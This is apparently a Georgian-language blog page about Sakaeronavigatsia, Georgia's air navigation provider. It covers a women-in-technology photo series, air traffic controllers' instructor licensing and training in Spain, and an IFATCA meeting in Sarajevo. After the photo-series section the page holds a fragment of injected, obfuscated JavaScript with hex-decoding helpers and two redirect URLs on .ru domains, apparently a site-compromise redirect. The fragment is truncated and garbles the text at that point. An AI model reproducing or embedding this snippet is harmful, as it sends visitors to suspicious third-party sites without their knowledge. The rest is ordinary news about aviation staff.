თანამედროვე ქალი ტექნოლოგიებში

Tbilisi Photo Festival – ის მიერ საქართველოში აშშ-ის საელჩოს მხარდაჭერით ჩატარებული ფოტო კონკურსის “თანამედროვე ქალი ტექნოლოგიებში“ გამარჯვებული ფოტო სერია.

აქსანა ლომიძე

 

“საქაერონავიგაცია“, საქართველოში 1999 წელს დაარსდა. კომპანია სწრაფად განვითარდა და საშუალება მიეცა განეხორციელებინა მაშტაბური ტექნიკური გადაიარაღება, თანამედროვე სისტემებზე გადასვლა და კადრების გადამზადება, შედეგად, საქართველოს საჰაერო სივრცე ევრაზიის საჰაერო დერეფნის ერთ-ერთი უმნიშვნელოვანესი ნაწილი გახდა და საჰაერო ხომალდების ნაკადმაც საგრძნობლად მოიმატა.

oksana lomidze

ეს ქალბატონები უკვე დიდიხანია „საქაერონავიგაცია“-ში საქმიანობენ, ისინი საჰაერო მოძრაობის მართვის მეთვალყურეები არიან.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "airnav.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

ქართველმა ავიამეთვალყურეებმა სამუშაო ადგილზე სწავლების ინსტრუქტორის ლიცენზია მიიღეს

 

საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს “საქაერონავიგაციის” ოთხმა ავიამეთვალყურემ  ინსტრუქტორის საერთაშორისო ლიცენზია მიიღო. 22 თებერვლიდან 4 მარტის ჩათვლით, ავიამეთვალყურეებმა ესპანეთში, ჰერესის საავიაციო სასწავლებელში წარმატებით გაიარეს სამუშაო ადგილზე სწავლების ინსტრუქტორად გადამზადების კურსი.

თანამშრომლები კომპანიამ სხვადასხვა რეგიონიდან შეარჩია. FTEJerez სასწავლებლის ლიცენზია საქართველოს სამოქალაქო ავიაციის სააგენტომ აღიარა, რომლის შემდეგაც ლიცენზირებული ავიამეთვალყურეები შეძლებენ, სამუშაო ადგილზე სხვა ქართველი ავიამეთვალყურეების სწავლებას.

ინსტრუქტორად გადამზადების კურსი

აღნიშნული კურსის მიზანი იყო, მონაწილეებისთვის მიეწოდებინა ფუნდამენტური ცოდნა, უნარები და მზაობა, რომელიც საჭიროა ინსტრუქტორისათვის. ტრეინინგი მოიცავდა ლექციებს, დისკუსიებს, როლურ თამაშებს და სიმულატორთან მუშაობას.

საქაერონავიგაცია

ავიამეთვალყურე – ერთ-ერთი ურთულესი პროფესია მსოფლიოში

ყურადღების მუდმივი კონცენტრაცია, ფსიქოლოგიური წნეხი და უდიდესი პასუხისმგებლობა, რომელიც ავიამეთვალყურეს აკისრია, მას მსოფლიოში ერთ-ერთ ურთულეს პროფესიად აქცევს.

ავიამეთვალყურეები 12 საათიან ცვლაში მუშაობენ, რათა უწყვეტ რეჟიმში, 24 საათის განმავლობაში უზრუნველყონ ფრენის უსაფრთხოება, თანმიმდევრულობა და დროულობა. მათი უპირველესი ფუნქციაა, რომ საჰაერო სივრცეში გადაადგილებისას თვითმფრინავებმა ერთმანეთისაგან დაშორებით იფრინონ და არ მოხდეს მათი სახიფათო მიახლოება. ავიამეთვალყურეები ასევე პასუხისმგებლები არიან თვითმფრინავის უსაფრთხო აფრენასა და დაშვებაზე.

საქაერონავიგაცია

ყოველივე ეს მათგან უდიდეს გონებრივ და ფიზიკურ ძალისხმევას მოითხოვს. ამიტომაა, რომ თითოეული ავიამეთვალყურისათვის სავალდებულოა სამედიცინო შემოწმების გავლა: სამ წელიწადში ერთხელ 40 წლამდე ასაკის მეთვალყურეებისათვის და ყოველწლიურად 40 წლის შემდეგ. აქედან გამომდინარე, მსოფლიოს სხვადასხვა ქვეყნებში ავიამეთვალყურის საპენსიო ასაკი სხვა პროფესიებთან შედარებით უფრო ნაკლებია.

სამეთვალყურეო კოშკი

საჰაერო მიმოსვლის მართვის პროცესში ავიამეთვალყურეთა მაღალი კვალიფიკაცია უმთავრესია.  სამუშაოს სპეციფიკიდან გამომდინარე, თითქოს უმნიშვნელო შეცდომაც კი შესაძლოა ფატალური შედეგით დასრულდეს. ამის გამო, ავიამეთვალყურეთა პროფესიონალიზმს დიდი ყურადღება ექცევა. საქაერონავიგაციაში დღეისათვის 100-ზე მეტი ავიამეთვალყურე მუშაობს, მათ შორის მრავალწლიანი გამოცდილებით და შედარებით ახალი თაობა, რომელიც საფრანგეთში, ქალაქ ტულუზაში, ENAC-ის უნივერსიტეტში დაეუფლა პროფესიას. ყველა ავიამეთვალყურე კომპანიაში პროფესიონალია და შესაბამის ლიცენზიას ფლობს. ისინი ყოველწლიურად გადიან სავალდებულო სწავლებას საჰაერო ნავიგაციისა და სააერნაოსნო უსაფრთხოების სასწავლებელში (SENASA), მადრიდში. ავიამეთვალყურეები მუდმივად იღებენ როგორც ახალ თეორიულ ინფორმაციას, როგორიცაა მაგალითად ცვლილებები საკანონმდებლო დოკუმენტებში, ახალი სტანდარტები და რეკომენდაციები, ასევე პრაქტიკულ გამოცდილებას სიმულატორთან მუშაობისას. ესპანეთში, საავარიო სიტუაციების მართვის ტრენინგის ფარგლებში ავიამეთვალყურეები 3D განზომილების, 360 გრადუსიან სიმულატორთან მუშაობენ. აღნიშნულ სასწავლებელში საქაერონავიგაციაში დასაქმებული ყველა მოქმედი ავიამეთვალყურე ეტაპობრივად გადის სწავლებას წელიწადში 5 კვირის განმავლობაში.

ყოველდღიურად ქართველი ავიამეთვალყურეები  საქართველოს საჰაერო სივრცეში საშუალოდ 400-მდე რეისს ემსახურებიან. მათი პროფესიონალიზმი აღიარებულია საერთაშორისო ორგანიზაციების მიერ.

ავიამეთვალყურეების გადამზადება მადრიდში

ყოველდღიურად 24 საათის განმავლობაში, საქართველოს საჰაერო სივრცეში თქვენს უსაფრთხო გადაადგილებაზე საქაერონავიგაციის ავიამეთვალყურეები ზრუნავენ.

ისინი მუდმივად გადიან გადამზადებას, იმისათვის, რომ დააკმაყოფილონ  თანამედროვე საკვალიფიკაციო მოთხოვნები. საქაერონავიგაციის 100-ზე მეტი, პროფესიონალი ავიამეთვალყურე ყოველწლიურად გადის სავალდებულო სწავლებას საჰაერო ნავიგაციისა და სააერნაოსნო უსაფრთხოების სასწავლებელში (SENASA), მადრიდში.  SENASA 1990 წლიდან თავაზობს ორგანიზაციებს ხარისხიან ტრენინგებს საჰაერო სივრცის მართვის სფეროში.

საავარიო სიტუაციების მართვის ტრენინგის ფარგლებში ავიამეთვალყურეები 3D განზომილების, 360 გრადუსიან სიმულატორთან მუშაობენ. აღნიშნულ სასწავლებელში საქაერონავიგაციაში დასაქმებული ყველა მოქმედი ავიამეთვალყურე ეტაპობრივად გადის სწავლებას წელიწადში 5 კვირის განმავლობაში.

საქართველოს სამსახურში – ევროპული სტანდარტით!

ავიამეთვალყურეთა ასოციაციების საერთაშორისო ფედერაციის (IFATCA) ევროპის რეგიონული შეხვედრა

18-20 ოქტომბერს სარაევოში ავიამეთვალყურეთა ასოციაციების საერთაშორისო ფედერაციის (IFATCA) 30-ე ევროპის რეგიონული შეხვედრა გაიმართა. ეს გახლავთ ევროპელ ავიამეთვალყურეთა პროფესიული კონფერენცია, რომელიც  ფრენის უსაფრთხოებაზე, საჰაერო მიმოსვლის მართვის ეფექტურეობასა და ავიამეთვალყურეთა პროფესიული უფლებების დაცვაზეა ფოკუსირებული.

1418325_755235994501868_631453888_n

ავიამეთვალყურეთა ასოციაციების საერთაშორისო ფედერაციის (IFATCA) 30-ე ევროპის რეგიონალური შეხვედრა

ავიამეთვალყურეთა ასოციაციების საერთაშორისო ფედერაციის (IFATCA) 30-ე ევროპის რეგიონალური შეხვედრა

ავიამეთვალყურეთა ასოციაციების საერთაშორისო ფედერაციის (IFATCA) 30-ე ევროპის რეგიონული შეხვედრა

შეხვედრას ესწრებოდა 150-ზე მეტი მონაწილე – დელეგატები ევროპის 37 ქვეყნიდან.

საქართველოდან IFATCA-ს შეხვედრას ქართველი ავიამეთვალყურეების პროფესიული კავშირის ლიდერებიც დაესწრნენ.

ავიამეთვალყურეთა პროფესიული კავშირი

მსგავსი შეხვედრები ავიამეთვალყურეებსა და საავიაციო ინდუსტრიას შორის პროფესიული ურთიერთობების გაღრმავების საუკეთესო საშუალებაა.

გთავაზობთ რამოდენიმე სლაიდს EUROCONTROL-ის უსაფრთხოების ჯგუფის უფროსის, Tony Licu-ს პრეზენტაციიდან:

1

2

3

4

5

6

7

8

9

99

999